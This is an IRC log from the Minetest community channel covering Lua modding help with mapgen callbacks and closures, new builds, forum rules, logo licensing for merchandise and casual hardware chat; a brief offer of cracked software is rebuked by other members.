16:10 sfan5 hm
16:11 Exio the problem is in Layer 8, i think
16:18 celeron55 i wonder how he knows something is sucking CPU if not from the process list
16:19 leo_rockway pebkac
16:19 leo_rockway also, hello everyone
16:19 leo_rockway is there any video of the particles in core?
16:23 PilzAdam I only know some WIP videos by Jeija
16:24 sfan5 are particles in master?
16:24 PilzAdam yep
16:24 sfan5 theres a win build coming ( if i didn't forgot to install cmake..)
16:25 sfan5_ joined #minetest
16:26 PilzAdam thexyz already has some win builds (with particles), I guess
16:26 thexyz yes
16:27 sfan5 the computer i have to use for win builds now is slow, it takes 35 secs to compile lua..
16:27 sfan5 *now, is slow
16:27 Exio how many time for compiling minetest?
16:27 sfan5 dunno, maybe 15 mins
16:27 Exio ~30 minutes here :P
16:40 leo_rockway maybe I'll install the win build. I want to test all the new stuff!
16:44 rubenwardy joined #minetest
16:45 xy joined #minetest
16:53 roboman2444 joined #minetest
16:55 berome joined #minetest
16:57 hmmmm joined #minetest
16:57 rubenwardy hi?
16:57 Exio hai
17:00 sfan5 joined #minetest
17:01 klunk hi
17:01 iqualfragile joined #minetest
17:06 PilzAdam VanessaE, look what your 512px TP does to my ram: http://www.zimg.eu/i/66831251
17:06 VanessaE yup, that's about right
17:06 VanessaE turn off item visual preloading
17:06 VanessaE that'll help
17:07 PilzAdam its already disabled
17:07 VanessaE how much RAM>
17:07 VanessaE ?
17:08 PilzAdam 4 GiB
17:08 VanessaE AMD64 build?
17:08 PilzAdam yep
17:08 VanessaE (well, 64 bit anyway)
17:08 VanessaE well what can I say, MT's memory management needs....work. :-)
17:09 PilzAdam well, 3.83 GiB
17:09 PilzAdam (4 108 320 768 Bytes)
17:10 VanessaE I use the 256px size these days; 512px just doesn't work well anymore for me :(
17:11 PilzAdam I still get > 60 FPS with 512+ All filters
17:11 VanessaE not me, I can't even sustain 30 fps anymore
17:11 VanessaE probably shitty video drivers or something
17:12 Exio i don't have lagspikes or anything with your HD texture pack VanessaE, but only with the default  "game"
17:12 Exio with more mods i can't even play, minetest just eats my entire ram
17:16 airlynx VanessaE, I can't enter your world, it's stuck on %100 media but not loading anything
17:16 FreeFull joined #minetest
17:16 thexyz fuck this shit http://forum.minetest.net/viewtopic.php?pid=64585#p64585
17:16 thexyz suggestion: ban people for smileys
17:16 PilzAdam +1
17:16 VanessaE thexyz:  no.
17:16 rubenwardy motion carried
17:16 PilzAdam :-)
17:17 airlynx nevermind
17:17 rubenwardy (thats a +1 from me)
17:17 VanessaE airlynx: it takes a while to sign in.
17:17 thexyz VanessaE: why not? i've got eye cancer
17:17 VanessaE hm, server's lagging, but it does sign in..
17:17 airlynx I saw that it was taking a while to download media so I left the computer, when I came back it was just sitting at %100 and I panicked, lol
17:17 thexyz because of that post
17:18 VanessaE airlynx: sign out/in.  I restarted it.
17:18 VanessaE bbl
17:19 klunk please don't ban people with a moderate use of smileys :-) , cause I rarely fail with them :-)
17:19 Zetetic`` joined #minetest
17:19 celeron55 thexyz: smileys are disabled on the forum for a reason
17:20 klunk on forums ? sorry
17:20 klunk this is understundable
17:20 thexyz hm.. can we disable animated avatars?
17:20 celeron55 thexyz: you are free to warn of a ban, and then ban
17:20 rubenwardy they attach smilies with the [img] from this site: http://www.santafemods.com/Smileys.htm
17:21 klunk Could you disable "more than 500 mails feature", please ? ;-)))))
17:21 thexyz um?
17:21 klunk I mean more than 500/2months
17:22 celeron55 added "Graphical smileys are disallowed." to rules
17:22 thexyz great
17:22 VanessaE I need to call find_nodes_in_area() from within minetest.register_on_generated()....what's the right syntax in that case?
17:22 klunk I wich (it is a dream) noone could flood with  a lot of crappy messages the forum
17:22 rubenwardy "not allowed" would be better grammatically
17:23 celeron55 also, i guess i'll add same for animated avatars
17:23 klunk because when you are new, you have to came across a desesperately huge amount of bullshit before have a info
17:23 PilzAdam VanessaE, http://dev.minetest.net/EnvRef
17:24 thexyz klunk: that'd be as great as punching people in the face over tcp/ip
17:24 PilzAdam VanessaE, minp and maxp are passed to register_on_generated() so its easy to get them
17:24 VanessaE PilzAdam: I don't understand what "EnvRef" means and it isn't explained anywhere.
17:24 thexyz wait, >Basically ServerEnvironment and ServerMap combined. Can be gotten via minetest.env
17:24 PilzAdam minetest.env
17:24 klunk thexyz: yes, this was not a real proposition, but problems is still here
17:24 VanessaE 12:25:07: ERROR[main]: ...minetest/mods/minetest/plantlife/plants_lib/init.lua:194: attempt to index field 'env' (a nil value)
17:25 VanessaE local searchblocks = table.getn(minetest.env:find_nodes_in_area(minp, maxp, ssurface))
17:25 PilzAdam VanessaE, be sure to put a : after env, like minetest.env:set_node()
17:25 VanessaE (the affected code)
17:25 klunk thexyz: don't you think people have usually more than 10 interresting stuffs to post by day ? :-)
17:26 thexyz klunk: limits are bad
17:26 thexyz VanessaE: pastebin full code
17:26 klunk thexyz: (sorry, I just read you do something =>forget me)
17:27 VanessaE http://paste.ubuntu.com/1546113/
17:28 sfan5 joined #minetest
17:29 klunk thexyz: totaly agree with that
17:29 VanessaE thexyz: why doesn't that code (well, line 49 of the paste) work?
17:32 thexyz VanessaE: can you provide example call to plantslib:generate_on_surfaces? (the one that produces such error)
17:32 VanessaE (also, when I said it "isn't explained anywhere" I meant the regular api.txt from the minetest repo)
17:32 VanessaE sure
17:32 VanessaE sec\
17:32 Calinou joined #minetest
17:33 VanessaE http://paste.ubuntu.com/1546131/
17:33 Calinou high five for ubuntu pastebin
17:34 Calinou "maximim" => "maximum" :P
17:34 VanessaE ignore the "jungletree_seed_diff" and wrong comments here and there, this started as a copy&paste from some code that was used for an ABM, I'm transitioning some code to work from the mapgen rather than ABM
17:34 VanessaE Calinou: oops :)
17:35 VanessaE thexyz: I figure, first I'll just generate something random like yellow wool just so I can see it showing up brightly against other stuff.
17:35 VanessaE then replace that with the real code.
17:38 klunk I wish some experimented modders here, explain a bit to me about this mod, http://forum.minetest.net/viewtopic.php?id=4491, what is weird with that; I'm only interrested by the bees and beehives part.
17:38 klunk hu, please
17:38 thexyz VanessaE: you forgot >plantslib = {}, though it seems to be not the only issue
17:39 VanessaE thexyz: that's at the start of the plants lib init.lua
17:39 VanessaE I just didn't paste the irrelevant stuff
17:39 thexyz yeah, i figured it out
17:39 thexyz well, your problem is quite simple
17:39 VanessaE I suck?
17:39 VanessaE :-)
17:40 thexyz you call register_on_generated(function()), that way it calls function() and then when on_generated occurs on_generated calls function()(), to make it work your function should return function
17:40 thexyz that simple!
17:40 VanessaE O.O
17:40 FreeFull_ joined #minetest
17:40 PilzAdam Lua is so beautiful
17:40 simion314 joined #minetest
17:41 thexyz that's called closures
17:42 thexyz VanessaE: http://bpaste.net/show/71197/
17:42 thexyz that's how it should be
17:42 thexyz though there are some other errors
17:45 VanessaE that seems...odd.
17:47 ShadowNinja joined #minetest
17:47 marktraceur All right, functional languages! Woo!
17:48 marktraceur Python decorators, by the way, are the same thing.
17:50 VanessaE thexyz: I don't understand (even after reading about it) why such syntax is necessaru
17:50 VanessaE necessary.
17:50 VanessaE can someone explain it in English please? :-)
17:50 marktraceur VanessaE: Basically it's a way to introduce a new scope where there otherwise wouldn't be one
17:51 nisio joined #minetest
17:51 thexyz =(
17:51 whirm1 joined #minetest
17:52 marktraceur OK, wow, that is a large number of arguments
17:52 thexyz that's why i suggested VanessaE to use table instead
17:53 Zetetic`` joined #minetest
17:53 anunakki joined #minetest
17:53 VanessaE well it runs now (after fixing a wrongly-used table.getn() call also) but it ain't actually adding anything.
17:54 VanessaE at least it doesn't crash
17:54 nisio i installed minetest through ubuntu software center anybody know what version it is?
17:54 VanessaE nisio: probably 0.3.x which is way outdated
17:54 PilzAdam very very outdated
17:55 Calinou nisio: try my one line install/compile command if you want to install latest version easily
17:55 PilzAdam Calinou, fix your changelog: "* Added particles when digging blocks (Jeija)" is by Jeija & PilzAdam
17:56 nisio thanks
17:56 VanessaE Calinou: your one-line install is broken
17:56 Calinou http://forum.minetest.net/viewtopic.php?id=3837
17:56 Calinou VanessaE: explain?
17:56 VanessaE Calinou: you left out -DRUN_IN_PLACE=
17:57 thexyz >This is intended: this one-line script is not intended for "portable" installs. The user data goes to .minetest, which means the whole minetest folder is cleaner
17:57 Calinou updated changelog: http://dl.dropbox.com/u/82342922/0.4.x-changelog.txt
17:57 Calinou VanessaE: feature, not a bug
17:57 Calinou user data goes to ~/.minetest and it is much better this way
17:57 Calinou like a packaged install
17:58 VanessaE Calinou: for some people your one-liner produces broken installs.
17:58 PilzAdam I dont understand people not using run in place
17:58 Calinou some people = who? what's broken?
17:58 Calinou PilzAdam: having their configuration in a single folder is better than putting user data in the same folder as program data
17:58 VanessaE I don't remember now who it was.
17:59 PilzAdam Calinou, maybe add both scripts to the topic so people can choose
17:59 Calinou good idea :P
18:01 nisio cd ~
18:02 Calinou readded spaces between ";"s too, more readable
18:03 PilzAdam the changelog in the software center tells something about a "Michael Gilbert <mgilbert@debian.org>", maybe someon should mail him that there are updates?
18:03 Calinou debian bug tracker would like to have a talk with you
18:03 Calinou http://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=minetest;dist=unstable
18:04 thexyz VanessaE: http://www.lua.org/pil/6.1.html
18:04 VanessaE thexyz: I already read that.
18:05 VanessaE and as with most every other part of the PIL, it's gibberish to someone like me who is used to simpler languages.
18:05 thexyz did that help?
18:05 thexyz oh
18:05 VanessaE I'm afraid not
18:05 VanessaE I had to go elsewhere to get something resembling English :)
18:06 marktraceur "PIL" = "Programming in Lua" and "Python Imaging Library"
18:06 marktraceur I was confused for a sec
18:06 klunk ok, I will try another time, later :-) ....cause I have to go, now, bye !
18:09 OldCoder Hi
18:09 OldCoder marktraceur, Hello
18:09 marktraceur OldCoder: What up?
18:11 Octupus joined #minetest
18:13 Octupus Hello
18:18 VanessaE thexyz: all right, what other errors?  All of the parameters inside search_surfaces() are coming up a nil
18:18 VanessaE -a
18:19 VanessaE this is all new territory for me
18:19 iqualfragile joined #minetest
18:20 VanessaE (apropos, considering I'm doing this *while generating* new territory ;) )
18:20 Octupus Can any1 help me with the animals mod on OC servers?
18:20 Octupus how do i catch a chicken or something
18:20 thexyz oh, wait
18:22 KikaRz joined #minetest
18:22 thexyz i did it wrong
18:22 KikaRz Hello!
18:22 KikaRz VanessaE is there?
18:22 thexyz VanessaE: http://bpaste.net/show/71209/
18:22 VanessaE hi
18:22 thexyz that one should work
18:22 KikaRz Cool... New Particles.
18:22 rubenwardy (5:58:12 PM) PilzAdam: I dont understand people not using run in place
18:22 rubenwardy +1
18:22 VanessaE thexyz: NOW that makes more sense!
18:23 KikaRz rubenwardy
18:23 KikaRz Well, the better for some people, is not using RUN IN PLACE
18:23 KikaRz reason: Roaming is enabled in Windows, so, they can make same way as Minecraft.
18:23 marktraceur Oh, rubenwardy, erlehmann got an email from cafepress last night
18:23 Octupus yea
18:23 Octupus if you want to see in windows you type in
18:24 Octupus %appdata%
18:24 KikaRz Aham.
18:24 marktraceur rubenwardy: They took down the merchandise with the logo on it because you didn't attribute him - not his fault, their policy
18:24 leo_rockway I don't use run in place in GNU/Linux. I compile using my package manager, so all my stuff is neatly put where it belongs.
18:24 VanessaE thexyz: still doesn't work, but at least the variables are getting through
18:24 VanessaE oh wait
18:25 VanessaE there.
18:25 thexyz marktraceur: how should we attribute him?
18:25 VanessaE it ain't adding nothin' to the map, but the code no longer crashes.  that's a start.
18:26 marktraceur thexyz: I'd imagine that a tiny bit of sideways text saying "(C) Nils Whateverhislastnameis 2011, CC-BY-SA"
18:26 KikaRz VanessaE, tell me the changelog
18:26 marktraceur ...would do it
18:27 VanessaE KikaRz: what changelog?
18:27 KikaRz plz
18:27 KikaRz from minetest
18:27 VanessaE oh
18:27 VanessaE ask Calinou  :-)
18:27 PilzAdam http://dl.dropbox.com/u/82342922/0.4.x-changelog.txt
18:27 VanessaE or PilzAdam ..
18:27 KikaRz Pilz, that is updated?
18:27 KikaRz i wanted "snapshot" changelogs
18:28 PilzAdam umm, read the first line?
18:28 KikaRz ah
18:28 KikaRz sry.
18:29 rubenwardy (6:24:23 PM) marktraceur: rubenwardy: They took down the merchandise with the logo on it because you didn't attribute him - not his fault, their policy
18:29 rubenwardy they took down all merchandise
18:30 rubenwardy "Content Usage Policy Warning  This image has been flagged as a possible violation of the CafePress Content Usage Policy and has been set to “pending status” which means it cannot be used on any products or available for purchase."
18:32 marktraceur rubenwardy: Not all of it, the black + gold one is still there
18:32 rubenwardy oh yeah
18:32 marktraceur rubenwardy: I'd suggest adding attribution and then they can allow the logo back on
18:33 rubenwardy It is not the logo, it is the name "minetest"
18:33 rubenwardy The dungeon master tshirt had no logo
18:34 rubenwardy *not just the logo
18:34 marktraceur rubenwardy: Minetest isn't trademarked, though
18:34 marktraceur Oh
18:34 rubenwardy yeah, I know
18:34 marktraceur The DM graphic is probably CC-BY-SA also
18:35 marktraceur Wait, shouldn't the Mese graphic be CC-BY-SA?
18:35 marktraceur Why didn't they take that down?
18:35 rubenwardy celeron55 gave permission for both of those
18:35 iqualfragile joined #minetest
18:40 thexyz marktraceur: can't we, say, add that to receipt?
18:40 sfan5 joined #minetest
18:41 mauvebic joined #minetest
18:41 marktraceur thexyz: I don't think so, because you need to display attribution wherever the work is, I think
18:41 ttk2 joined #minetest
18:41 marktraceur rubenwardy: Wouldn't matter, he doesn't hold the copyright, erlehmann does
18:42 sfan5 new minetest win32 build: http://sfan.sf.funpic.de/minetest-builds/c55/minetest-0.4.4-d1-c691d61-win32.7z
18:42 thexyz marktraceur: can we ask erlehmann to make an exception?
18:43 rubenwardy celeron55 holds the copyright of the DM + Mese, doesn't he?
18:43 thexyz i doubt anyone would wear t-shirt with copyright notice
18:43 marktraceur thexyz: First, people do all the time, it doesn't have to be a *big* copyright notice
18:44 marktraceur thexyz: Second, erlehmann could make an exception, but largely the best way for that to happen is to use CC0, which would sort of defeat the purpose of CC-BY-SA
18:44 thexyz i examined my t-shirt right now and i can't find any copyright notice
18:44 thexyz well, anyway
18:44 nisio i could be on the tag at the neck
18:44 codile_ joined #minetest
18:44 sfan5 minetest t-shirts?
18:45 thexyz probably, but can we add it to the tag?
18:45 jojoa1997 joined #minetest
18:45 nisio yeah that might be a problem
18:46 marktraceur thexyz: You might not be wearing one with a copyrighted image
18:46 marktraceur thexyz: I've seen a lot of comic book t-shirts with that sort of thing
18:46 jojoa1997 what was copyrighted
18:46 thexyz that's just weird
18:46 marktraceur jojoa1997: The Minetest logo, and others
18:46 marktraceur thexyz: It's tiny, I swear
18:47 nisio well minetest is GPL is the logo copyrighted
18:47 jojoa1997 the logo is copyrighted
18:47 nisio hmm
18:47 rubenwardy you can only put stuff on the front of the T-Shirt
18:48 nisio you could incorporate it into the design
18:48 marktraceur rubenwardy: Put some tiny text on one side of it or something
18:48 PilzAdam nisio, Minetest is LGPL
18:48 thexyz we should ask erlehmann to release it under cc0 then
18:48 marktraceur rubenwardy: It's really not that big a deal
18:49 thexyz yes, instead of t-shirt with logo & "minetest", you'll get one with large copyright notice, great
18:49 sfan5 ^
18:49 marktraceur thexyz: Why do you assume it has to be large?
18:50 marktraceur thexyz: It can be like, size 4 font.
18:50 thexyz still, it'll look odd
18:50 marktraceur It just has to have the information on it somewhere.
18:50 * marktraceur will show you
18:50 marktraceur rubenwardy: Do you have the image of the shirt up somewhere?
18:52 meldrian joined #minetest
18:52 PilzAdam hello meldrian
18:53 rubenwardy http://multa.bugs3.com/upload/tshirts/
18:53 VanessaE yay!  my code works :-)    thexyz:  thanks for the tip, after a few syntax errors it's working as expected.
18:53 VanessaE http://digitalaudioconcepts.com/vanessa/hobbies/minetest/screenshots/screenshot_1325527474.png
18:53 VanessaE the yellow wool represents the output of the algorithm.
18:54 Calinou inb4 someone suggests wool trees
18:54 VanessaE Calinou: hah!  in this case, just bright, easy-to-spot placeholders :-)
18:54 Calinou VanessaE: idea: mushrooms near trees? :-D
18:54 Calinou ...then you could make soup like in minecraft
18:54 VanessaE mushrooms near trees would be easy actually.
18:55 rubenwardy (hint, food mod contains soups)
18:55 rubenwardy no mushroom ones though...
18:55 * VanessaE takes a break and goes to snoop on the remodeling contractor..)
18:55 * rubenwardy loves HTML5 and Canvases
18:57 mauvebic canvasses?
18:58 Calinou canvices?
18:58 Calinou *vertex plural troll*
18:58 mauvebic what are the differences between html4 and 5? (i learned on 2/3 lol)
18:59 rubenwardy http://multa.bugs3.com/file_upload.php?folder=tshirts
18:59 rubenwardy HTML5 is a lot better
18:59 mauvebic thats what they say about each new version of everything :P
18:59 marktraceur rubenwardy, thexyz: http://marktraceur.info/shared/minetest_logo.png
18:59 rubenwardy http://lmgtfy.com/?q=differences+between+html4+and+5%3F
18:59 marktraceur Change to style and so on
19:00 mauvebic theres tons of crap on google that focuses on a narrow subject or feature...
19:00 Calinou marktraceur: for people's eyes sakes, use the svg logo
19:01 mauvebic dont forget your results are your results mostly, they personalized for everyone these days
19:01 * Calinou vomits a frame pointer
19:01 * marktraceur doesn't care
19:01 Calinou also, use ©, not copyright
19:01 marktraceur It was just an example
19:01 Calinou shorter :P
19:01 rubenwardy how about
19:01 rubenwardy "Minetest Logo (c) to <name>, CC-BY SA (c)"
19:01 rubenwardy without the last (c)
19:01 marktraceur rubenwardy: The second (c) isn't necessary, yeah
19:01 Calinou can't you write CC BY-SA 3.0 instead of attribution-sharealike?
19:01 marktraceur rubenwardy: CC-BY-SA might not work. But you definitely need 3.0.
19:02 Calinou :|
19:02 * marktraceur will be fine with CC-BY-SA, just not sure who won't be
19:02 marktraceur Ideally it would include a link to the license
19:03 marktraceur (there are short versions)
19:03 rubenwardy nah
19:03 mauvebic damn lol
19:04 rubenwardy mauvebic: http://electronicdesign.com/site-files/electronicdesign.com/files/archive/electronicdesign.com/content/content/64491/64491_fig1.jpg
19:04 marktraceur ....
19:05 marktraceur WebServerError: Your web server sucks, find a better one
19:05 mauvebic hmm, so it eliminates the need for CSS lol i though theyd have sql support by now
19:05 rubenwardy no, it does not
19:05 rubenwardy it makes the code simpler to understand
19:06 rubenwardy <div id="header">   ==  <header>
19:07 mauvebic ok not that different then
19:07 marktraceur The problem being that not every website is exactly the same.
19:08 mauvebic were getting there tho lol
19:08 rubenwardy http://spielzeugz.de/html5/liquid-particles.html
19:08 rubenwardy html5 canvas
19:08 rubenwardy http://net.tutsplus.com/articles/web-roundups/21-ridiculously-impressive-html5-canvas-experiments/#
19:08 marktraceur http://html5doctor.com/element-index/#aside
19:08 marktraceur *not* a sidebar.
19:09 marktraceur At least not in the way they mean.
19:09 mauvebic do they show the code?
19:10 mauvebic what drives me nuts about the big corporate sites today is the 50 or so links on the homepage that lead to the same 4-5 sections lol
19:10 rubenwardy yes
19:10 rubenwardy in javascript links
19:10 rubenwardy <script type="text/javascript" charset="utf-8" src="mootools.js"></script>
19:10 rubenwardy etc
19:10 meldrian hello PilzAdam :)
19:10 mauvebic and these fuck-ugly disproportionate pop-up/rolldown/fadein menus when youre trying to read and you accidentally hover
19:12 mauvebic its like desktops are getting dumber and websites more complex lol
19:15 TheZenKitteh joined #minetest
19:15 rubenwardy mauvebic: lol
19:19 mauvebic if xfce falls, ill have to retreat to openbox lol
19:19 mauvebic and then we will take the fight to the gates of mordor
19:19 rubenwardy I like this: http://hakim.se/experiments/html5/trail/03/
19:22 rubenwardy cool
19:22 rubenwardy http://www.nihilogic.dk/labs/pocket_full_of_html5/#presets/pre3d_eq.js
19:23 mauvebic its not doing anything
19:23 rubenwardy press the play button
19:23 rubenwardy to the right
19:25 mauvebic had to try it in firefox (which reminds me of starting up the new yorker 77...) lol
19:27 rubenwardy game development tutorials using canvas
19:27 rubenwardy http://www.canvasdemos.com/2009/07/09/game-development-tutorials/
19:31 mauvebic youd think someone could write a minetest world visitor with that
19:31 mauvebic though i doubt a browser could handle that much media at once lol
19:33 rubenwardy "onomatopia"
19:33 rubenwardy https://github.com/xyzz/onomatopoeia/
19:33 rubenwardy http://minetest.ru/onomatopoeia/
19:33 rubenwardy http://minetest.ru/onomatopoeia/
19:33 rubenwardy ^ that one
19:33 FreeFull_ joined #minetest
19:34 mauvebic isnt that the isometric mapper?
19:34 rubenwardy yeah
19:34 mauvebic its in uhm, python?
19:34 mauvebic i posted a 30mg pic of my space map with that
19:34 marktraceur Oh, that's what it is
19:35 mauvebic which what? lol
19:35 marktraceur I think someone asked once "How's onomatopoeia doing" and I interrupted with "KSSSSSHHHHHHHHH"
19:35 marktraceur Now I feel a little sorry :/
19:35 mauvebic http://ompldr.org/vZ3cweA
19:38 MilanFIN joined #minetest
19:40 kaeza joined #minetest
19:40 PilzAdam marktraceur, it was me :-)
19:40 Octupus Im octu am can some1 help me get a new idea for a mod that a newbie modder can handle?
19:40 mauvebic im updating that map now, though it doesn't work so well for my other map, buildings too tall lol
19:40 kaeza hey all
19:41 Octupus hewwo
19:41 mk joined #minetest
19:42 mauvebic i cant decide between regular cars and hover cars :/
19:45 mauvebic i dont think entities can climb nodeboxes like players do ?
19:45 kaeza Octupus, what idea?
19:45 kaeza mauvebic, regular cars
19:45 Octupus kaeza,?
19:46 kaeza <Octupus> Im octu am can some1 help me get a new idea for a mod that a newbie modder can handle?
19:46 Octupus i need an idea
19:46 mauvebic wouldn't roads have to be all the same elevation for regular cars to work?
19:47 Muadtralk1 joined #minetest
19:48 * VanessaE is back
19:48 mauvebic this highway works for both http://www.zimg.eu/i/761101166
19:48 kaeza wb V
19:49 babyface1031 joined #minetest
19:49 john_minetest joined #minetest
19:53 Nikondork_ joined #minetest
19:53 neko259 joined #minetest
19:56 Octupus_ joined #minetest
20:03 mauvebic epic fail of 2013: http://bigstory.ap.org/article/brazil-police-officer-shot-dead-fake-holdup
20:04 Calinou brazil police officer: shot dead fake holdup
20:04 Calinou how can brazil office policers *shot* holdups?
20:05 FreeFull joined #minetest
20:05 mauvebic a cop thought it would be funny to fake a hold up, his partner shot him dead lol
20:05 Jordach joined #minetest
20:05 Jordach joined #minetest
20:06 Calinou teamkiller?
20:10 FreeFull_ joined #minetest
20:11 * Jordach is still feeling sick
20:11 Jordach hey Calinou
20:11 Calinou hi
20:11 * Jordach can barely think
20:12 mauvebic gin, if it doesn't cure the cold ittl at least make the germs dizzy
20:12 * marktraceur has heard tequila, but it was from an hispanic man. Gin might work too.
20:13 Calinou Jordach: buy a CPU fan, put it on your head, ???, PROFIT
20:13 * Jordach will only drink wheat / ethanol based beer
20:13 Calinou marktraceur: alcohol is waste of money 8)
20:13 * Calinou drinks no beer, pwnt
20:14 marktraceur Calinou: I disagree heavily. But that's not your problem :)
20:14 Jordach if we ever have a minetestcon, im bringing the beer
20:14 Calinou my i7 agrees
20:14 mauvebic i7's dont make all your colleagues and family more tolerable ;)
20:15 Calinou the extreme edition ones do, since they get hot so easily, useful in winter
20:15 Jordach (considering i earn 600 euro due to my mental illness, also, i cant fend for myself..sometimes)
20:15 Jordach Calinou, Intel XEON for gaming :P
20:16 Calinou no! AMD FX 4100 is better!
20:16 Jordach Calinou, www.chillblast.com/Chillblast-Fusion-Leviathan.html
20:16 Calinou fun fact #121: my CPU has the highest power consumption of all quad core intel CPUs
20:17 Jordach fun fact #1: my old PC can still kick Calinou's PC's ass at reliability
20:17 Calinou lol, the stripes on the background make my screen "flicker" a bit
20:17 Jordach (yes, mines that old its fixable and cheap..p4's are common now :P )
20:17 Calinou "Windows 7 Ultimate 64bit OEM" <= you don't put windows on high end computers (and low end ones too...)
20:18 Calinou Jordach: mine is fixable too but less cheap :-D
20:18 jojoa1997 joined #minetest
20:18 Jordach Calinou, theres a reason: anything else cant address 30-40 odd gb
20:18 Octupus Hi Jordach
20:18 jojoa1997 can anyone test going on this server i cant get on
20:18 jojoa1997 Ip Address: diamondmining.no-ip.org Port: 30000
20:18 Calinou almost all desktop motherboards support 32GB
20:18 Jordach Calinou, not mine, just 2gb over here
20:19 Calinou and linux 64 bit, and 32 bit PAE can both use 32GB RAM
20:19 Octupus hi jojoa1997
20:19 Calinou hi
20:19 Jordach (then again, this is cheaper)
20:19 mauvebic as you get older you learn to spend less on computers because you realize no matter how much you spend in 2-3 years its old
20:19 jojoa1997 hiya see up there?|
20:19 Jordach Calinou: i have a PC lag of around 6 years
20:19 Calinou "£8333.33 ex VAT (£10000.00 inc VAT)" <= wat
20:19 jojoa1997 hiya see up there /\
20:19 Calinou the performance-to-price ratio of that box is terrible
20:19 Jordach Calinou, thats about 9000 euro
20:19 Calinou with VAT, 11000 euros?
20:19 mauvebic 9K?
20:20 Calinou I said including VAT :p
20:20 Jordach yes -- its hand built
20:20 mauvebic it better come with hand-painted periwinkles at that price
20:20 Jordach btw, its completely uk manufactured
20:20 anunakki joined #minetest
20:21 Jordach (yes, im in need of a new tower)
20:21 mauvebic its so much cheaper here, a week's pay for a decent machine
20:21 Calinou 11000 euros is still way too much expensive, lol
20:21 Calinou with 900-1200 euros you can make a pretty good desktop already :P
20:21 mauvebic 11K you almost have a downpayment for a condo in montreal lol
20:21 Jordach Calinou, depends on the shop
20:22 * Jordach likes ebuyer
20:22 jojoa1997 can anyone test that server
20:22 Calinou buy hardware then build yourself
20:22 Calinou I did a big mistake by buying an OEM desktop :|
20:22 Jordach Calinou, not really nope.
20:22 mauvebic you buy a basic box (with the mobo you need) and build up with new parts from there
20:22 Calinou shit PSU, shit fan (noisy but efficient), way too big HDD
20:22 Jordach Calinou, thats a bonus, not a negative
20:22 jojoa1997 Octopus: i cant get on Ip Address: diamondmining.no-ip.org Port: 30000
20:22 mauvebic seriously lol
20:23 Calinou Jordach: i'd rather get a SSD instead of an HDD
20:23 Calinou HDDs are things of the past..
20:23 Jordach pussy.
20:23 mauvebic lol
20:23 Jordach Calinou, expect them to burn out soon >:D
20:23 Octupus ok jojoa1997 il check it out
20:23 Calinou them, the SSDs or the HDDs?
20:23 Jordach (they usually have 1000 writes)
20:23 mauvebic yeah because i definately trust those big cloud providers to stay in business and not sell my info
20:23 jojoa1997 Octopus: thanks
20:24 Jordach mauvebic, nothing like keeping your own data
20:24 mauvebic im more likely to buy external drives now
20:24 Calinou home servers ftl (ftw only for your electricity company)
20:24 Calinou external drives, lol
20:24 mauvebic more efficient that usb keys and network transfer between 3-4 machines
20:24 mauvebic most externals now operate off the wifi network
20:24 Calinou if you want one, get a usb 3.0 one :P
20:25 Jordach mauvebic, Calinou -- external drives are useful when moving important files and backing shit up
20:25 Calinou yeah
20:25 mauvebic like a network drive
20:25 Jordach like the pr0n folder
20:25 Calinou the wifi feature is beyond pointless
20:25 Octupus jojoa1997: its dwn
20:25 jojoa1997 k
20:25 Calinou mine is 220M
20:25 mauvebic not for me, you know how many seasons the original law & order has?
20:25 Calinou 220M.minecraft/
20:25 Calinou :-D
20:25 Calinou mauvebic: google
20:26 Jordach Calinou, 220m == ??
20:26 kaeza ~/.minetest/ 1.5G
20:26 Calinou megabytes
20:26 Jordach peh
20:26 Calinou 352M for me kaeza
20:26 Calinou 295M after removing debug.txt
20:27 Jordach about 32mb here
20:27 Octupus jordach, Calinou, cracked or paid MC
20:27 Jordach (i get bored playing sp)
20:27 kaeza if I remove debug.tx, I'd probably get only ~200M
20:27 Jordach Octupus, 0.3 Classic thx
20:27 Calinou paid it 10 euros back in december 2010
20:27 Calinou the price was more interesting back then :)
20:27 Octupus Jordach,Cracked :P
20:27 Jordach Calinou, yup
20:27 Octupus I can send you a link if you want
20:28 kaeza debug.txt: 992M O.o
20:28 Calinou Octupus: freenode staff would like to have a talk with you
20:28 Octupus why
20:28 Jordach Octupus, /me bets is winXX only
20:28 kaeza 922M *
20:28 * KikaRz bets is LIN only
20:29 KikaRz or LNX
20:29 kaeza o hai KikaRz
20:29 Jordach Octupus, http://freenode.net/policy.shtml#offtopic
20:30 Octupus OOO i seee
20:30 Jordach soooo.... zip it.
20:30 marktraceur Octupus: Yeah, please don't discuss illegal things in here
20:31 Octupus ok
20:31 Calinou someone called XtremeWiz PM'd me then left... lol
20:31 Calinou he was on no channels
20:31 marktraceur Odd
20:31 marktraceur Calinou: What'd he say?
20:32 mauvebic hey guys, i need help burying a couple of bodie....errr... nevermind :-D
20:32 Jordach mauvebic, :P
20:32 mauvebic does that mean i cant hold my usual black panther meetings of freenode?
20:33 marktraceur mauvebic: We don't have anything against felines of any particular hue, just keep it in an offtopic channel
20:33 mauvebic (on the internet, no one knows you're not black) :p
20:34 Calinou mauvebic: "hi", nothing else
20:34 * marktraceur is not mauvebic but OK
20:34 marktraceur Calinou: Well that's weird, man
20:35 Octupus why doesnt some1 make an offtopic channel for minetest?
20:35 marktraceur Octupus: Because minetest isn't off topic?
20:35 jojoa1997 simple type /join #minetest-offtopic
20:35 Octupus marktraceur,what happen if some1 wanna know something but it isnt allowed in this channel?
20:36 marktraceur Octupus: You ask in a channel where it's on topic
20:36 mauvebic death by firing squad
20:36 marktraceur Octupus: What do you need to know?
20:36 marktraceur (PM me if it's long)
20:36 Octupus nothing
20:36 Octupus it just seemed like a good idea at the time
20:38 berome joined #minetest
20:48 OldCoder Back
20:48 Octupus wb OldCoder
20:49 OldCoder ty
20:51 VanessaE in the register_on_generated() function, how wide is the range of minp/maxp?  one mapblock, or 5x5x5?
20:51 PilzAdam one mapblock
20:51 VanessaE ok
20:51 PilzAdam you can print some math.abs(minp.x-maxp.x) to test it
20:52 PilzAdam since the mapblock size is hard coded you dont really know it from Lua
20:52 PilzAdam make sure that changing it to 32 or so doesnt break your mod
20:52 kaeza PilzAdam, thanks for the suggestion for the lava suit
20:52 PilzAdam its less hacky ;-)
20:53 Nikondork joined #minetest
20:53 Traxie21 joined #minetest
20:53 VanessaE well after much testing, I'm not so sure I'm gonna bother hooking into this.  it's so slow :-(
20:53 kaeza hehe right
20:53 Zetetic joined #minetest
20:53 PilzAdam VanessaE, every single modder who tried to play arround with the mapgen comes to this point
20:54 PilzAdam thats why nether mod is abandoned
